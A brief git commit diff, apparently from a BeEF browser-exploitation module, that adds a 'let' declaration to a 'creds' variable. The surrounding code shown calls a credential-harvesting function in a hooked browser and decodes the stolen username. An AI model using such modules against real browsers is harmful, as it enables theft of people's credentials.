init 'creds' var

This commit is contained in:
Stephen
2024-03-19 14:07:45 +10:00
parent 312e397bb7
commit f3e3e6b014

View File

@@ -14,7 +14,7 @@ beef.execute(function() {
if (typeof getcredentials === "function") {
setTimeout(function () {
creds = getcredentials();
let creds = getcredentials();
var result = [];
result.push({
"username": rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])),